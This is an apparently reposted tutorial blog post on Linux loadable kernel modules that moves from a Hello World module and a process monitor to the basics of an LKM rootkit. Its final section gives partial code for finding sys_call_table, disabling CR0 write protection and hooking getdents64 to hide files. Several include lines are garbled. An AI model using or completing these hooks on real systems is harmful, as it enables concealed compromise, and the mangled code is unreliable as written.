LKM Addict, learning the basics of lkm-C++-php.cn

Home

Backend Development

C++

LKM Addict, learning the basics of lkm

Mary-Kate Olsen

Oct 09, 2024 am 06:09 AM

Hey folks! Today, I’m going to walk you through LKMs (Loadable Kernel Modules)—from a simple "Hello World" module all the way to creating an LKM rootkit. If you find this helpful, feel free to share it, and thanks in advance to everyone who reads till the end. You'll find all the code and references linked at the bottom of the post, so be sure to check out the sources. Trust me, digging into those and modifying the code will really help you learn more. Heads-up though—some of the code is under the GPL 3 license, so make sure you’re aware of the terms.

What You’ll Need:

linux-headers-generic
A C compiler (I recommend GCC or cc)

Table of Contents:

1) What is LKM and how it works
2) Example LKM Makefile
3) How modules get loaded into the kernel
4) LKM "Hello World"
5) Key changes over the years
6) Syscall table changes in Kernel 5.7
7) LKM for process monitoring
8) Building an LKM rootkit

1) What is LKM and how it works:

LKMs are Loadable Kernel Modules that help the Linux kernel extend its functionality—like adding drivers for hardware without needing to recompile the entire kernel. They’re perfect for device drivers (like sound cards), file systems, etc. Every LKM at the very least needs these two basic functions:

static int __init module_init(void)
{
    return 0;
}

static void __exit module_exit(void)
{
}

2) Example LKM Makefile:

Here’s a super simple Makefile for compiling your module:

obj-m := example.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)

all:
 $(MAKE) -C $(KDIR) M=$(PWD) modules

clean:
 $(MAKE) -C $(KDIR) M=$(PWD) clean

3) How Modules Get Loaded into the Kernel:

You can see the modules loaded into the kernel with the lsmod command. It checks the info in /proc/modules. Modules usually identify the kernel through aliases like this:

alias char-major-10–30 softdog

This tells modprobe that the softdog.o module should be loaded, and it checks /lib/modules/version/modules.dep for dependencies created by running depmod -a.

4) LKM "Hello World":

Here’s how to make a super basic "Hello World" module:

#include <linux> 
#include <linux> 
#include <linux>   

static int __init hello_init(void)
{
    printk(KERN_INFO "Hello World\n");
    return 0;
}

static void __exit hello_exit(void)
{
    printk(KERN_INFO" Bye bye!");
}

module_init(hello_init);
module_exit(hello_exit);

MODULE_AUTHOR("BrunoCiccarino");
MODULE_LICENSE("GPL");
</linux></linux></linux>

5) Key Changes in LKM over the Years:

There have been some pretty significant changes in LKMs over time, so let’s break them down by Linux kernel version:

Kernel 2.x (up to 2.6):

Initial support for dynamic LKM loading and unloading.
Better debugging tools (OOPS, PANIC).
Kernel 2.6.x:

Introduction of udev for better device management.
Preemptive kernel for quicker response times.
Native Posix Thread Library (NPTL) improves handling of multithreaded processes.
Kernel 3.x:

Support for namespaces, improving container tech like Docker.
Filesystem and GPU driver improvements.
Kernel 4.x:

Kernel security gets a boost with KASLR.
Better container support (Cgroups, namespaces).
New hardware support.
Kernel 5.x:

Better filesystem encryption and live patching.
Expansion of BPF beyond just networks.
Better RISC-V and ARM support.
Kernel 5.7:

Major change: the syscall table (sys_call_table) became less accessible for security reasons. Modules that needed to modify the syscall table had to adapt.
Kernel 6.x:

Rust language support for safer kernel module development.
Security and isolation improvements, with a focus on energy efficiency for mobile devices.

6) Changes in the Syscall Table in Kernel 5.7:

In Linux 5.7, changes were made to protect the syscall table. It’s now write-protected and not easily accessible, which is a big win for security but complicated things for legitimate modules that rely on it. If you were using kprobes.h to find the sys_call_table, you’d need a new strategy. Now, you can’t modify it directly due to protections like Write-Protection (WP).

7) LKM for Process Monitoring:

This is a module that monitors processes in the kernel by periodically running checks (e.g., every 2 seconds) using a timer. It watches for things like process creation and termination, file access, and network usage.

Here’s a bit of code to get you started with that:

#include <linux>
#include <linux>
#include <linux>
#include <linux>

static struct timer_list procmonitor_timer;

static void procmonitor_check_proc_tree(unsigned long unused)
{
    struct task_struct *task;
    for_each_process(task)
        printk(KERN_INFO "process: %s, PID: %d\n", task->comm, task->pid);

    mod_timer(&procmonitor_timer, jiffies + msecs_to_jiffies(2000));
}

static int __init procmonitor_init(void)
{
    setup_timer(&procmonitor_timer, procmonitor_check_proc_tree, 0);
    mod_timer(&procmonitor_timer, jiffies + msecs_to_jiffies(200));
    return 0;
}

static void __exit procmonitor_exit(void)
{
    del_timer_sync(&procmonitor_timer);
}

module_init(procmonitor_init);
module_exit(procmonitor_exit);
</linux></linux></linux></linux>

8) LKM Rootkits:

Rootkits are basically malicious modules that hijack system calls to hide malware. Here’s how they hook into the syscall table and modify behavior.

First, you need to locate the syscall table:

unsigned long *find_syscall_table(void)
{
    typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);
    kallsyms_lookup_name_t kallsyms_lookup_name;
    register_kprobe(&kp);
    kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;
    unregister_kprobe(&kp);
    return (unsigned long*)kallsyms_lookup_name("sys_call_table");
}

Then, you can unprotect the memory where the syscall table is:

static inline void unprotect_memory(void)
{
    write_cr0_forced(cr0 & ~0x00010000);
}

After that, replace the original function with your hook:

static int __init ghost_init(void)
{
    __syscall_table = find_syscall_table();
    if (!__syscall_table) return -1;

    cr0 = read_cr0();
    orig_getdents64 = (void *)__syscall_table[MY_NR_getdents];
    unprotect_memory();
    __syscall_table[MY_NR_getdents] = (unsigned long)hook_getdents64;
    protect_memory();
    return 0;
}

The hook function intercepts and hides files:

asmlinkage int hook_getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count) {
    int ret = orig_getdents64(fd, dirp, count);
    // Intercept the syscall here...
    return ret;
}

LKM Addict, learning the basics of lkm

製作人員

駭客的選擇
elinux
內核br
xcellerator
lkmpg
愛貓人士
我的rootkit
二嗎啡

The above is the detailed content of LKM Addict, learning the basics of lkm. For more information, please follow other related articles on the PHP Chinese website!

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Debunking the Myths: Is C Really a Dead Language?May 05, 2025 am 12:11 AM

C is not dead, but has flourished in many key areas: 1) game development, 2) system programming, 3) high-performance computing, 4) browsers and network applications, C is still the mainstream choice, showing its strong vitality and application scenarios.

C# vs. C : A Comparative Analysis of Programming LanguagesMay 04, 2025 am 12:03 AM

The main differences between C# and C are syntax, memory management and performance: 1) C# syntax is modern, supports lambda and LINQ, and C retains C features and supports templates. 2) C# automatically manages memory, C needs to be managed manually. 3) C performance is better than C#, but C# performance is also being optimized.

Building XML Applications with C : Practical ExamplesMay 03, 2025 am 12:16 AM

You can use the TinyXML, Pugixml, or libxml2 libraries to process XML data in C. 1) Parse XML files: Use DOM or SAX methods, DOM is suitable for small files, and SAX is suitable for large files. 2) Generate XML file: convert the data structure into XML format and write to the file. Through these steps, XML data can be effectively managed and manipulated.

XML in C : Handling Complex Data StructuresMay 02, 2025 am 12:04 AM

Working with XML data structures in C can use the TinyXML or pugixml library. 1) Use the pugixml library to parse and generate XML files. 2) Handle complex nested XML elements, such as book information. 3) Optimize XML processing code, and it is recommended to use efficient libraries and streaming parsing. Through these steps, XML data can be processed efficiently.

C and Performance: Where It Still DominatesMay 01, 2025 am 12:14 AM

C still dominates performance optimization because its low-level memory management and efficient execution capabilities make it indispensable in game development, financial transaction systems and embedded systems. Specifically, it is manifested as: 1) In game development, C's low-level memory management and efficient execution capabilities make it the preferred language for game engine development; 2) In financial transaction systems, C's performance advantages ensure extremely low latency and high throughput; 3) In embedded systems, C's low-level memory management and efficient execution capabilities make it very popular in resource-constrained environments.

C XML Frameworks: Choosing the Right One for YouApr 30, 2025 am 12:01 AM

The choice of C XML framework should be based on project requirements. 1) TinyXML is suitable for resource-constrained environments, 2) pugixml is suitable for high-performance requirements, 3) Xerces-C supports complex XMLSchema verification, and performance, ease of use and licenses must be considered when choosing.

C# vs. C : Choosing the Right Language for Your ProjectApr 29, 2025 am 12:51 AM

C# is suitable for projects that require development efficiency and type safety, while C is suitable for projects that require high performance and hardware control. 1) C# provides garbage collection and LINQ, suitable for enterprise applications and Windows development. 2)C is known for its high performance and underlying control, and is widely used in gaming and system programming.

How to optimize codeApr 28, 2025 pm 10:27 PM

C code optimization can be achieved through the following strategies: 1. Manually manage memory for optimization use; 2. Write code that complies with compiler optimization rules; 3. Select appropriate algorithms and data structures; 4. Use inline functions to reduce call overhead; 5. Apply template metaprogramming to optimize at compile time; 6. Avoid unnecessary copying, use moving semantics and reference parameters; 7. Use const correctly to help compiler optimization; 8. Select appropriate data structures, such as std::vector.

See all articles